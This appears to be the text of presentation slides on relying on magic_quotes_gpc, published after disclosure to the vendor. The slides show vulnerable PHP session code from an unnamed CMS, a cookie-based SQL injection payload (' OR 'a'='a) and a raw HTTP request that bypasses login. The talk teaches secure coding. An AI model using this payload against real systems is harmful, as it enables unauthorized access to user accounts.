Attack ALert :: Magic Quotes :: Real World
Attack ALert :: Magic Quotes :: Real World
- Do NOT let magic_quotes_gpc determine the security of your application.
-
- Be aware of the requirements for your application.
- Unnamed Popular CMS -- current stable version (as of 2006-04-20)
23.cf5dfc3f4e21fa3d1b0af26c9e72dffd
-
// line: 1026 - init_session () [trimmed]
-
list($uid,
$upw)=
explode(".",
$_COOKIE[$pref['cookie_name']]);
-
// line 1039
-
if($result = get_user_data($uid, "AND md5(u.user_password)='{$upw}'", FALSE)) {
-
// line: 783 - get_user_data ($uid, $extra, $force_join)
-
$qry = "SELECT * FROM #user AS
u WHERE u.user_id='{$uid}' {$extra}";
-
// file: class2.php line: 785 - get_user_data ()
-
if ($sql->db_Select_gen($qry))
-
1.%27%20OR%20%27a%27%20=%20%27a
-
AND md5(u.user_password)='' OR 'a' =
'a'
telnet host.net 80
GET /page.php HTTP/1.1
Host: host.net
Cookie: cookie=1.%27%20OR%20%27a%27%20=%20%27a
BTW: I have made the CMS vendor aware of this, and asked permission to talk about this vulnerability in this
presentation.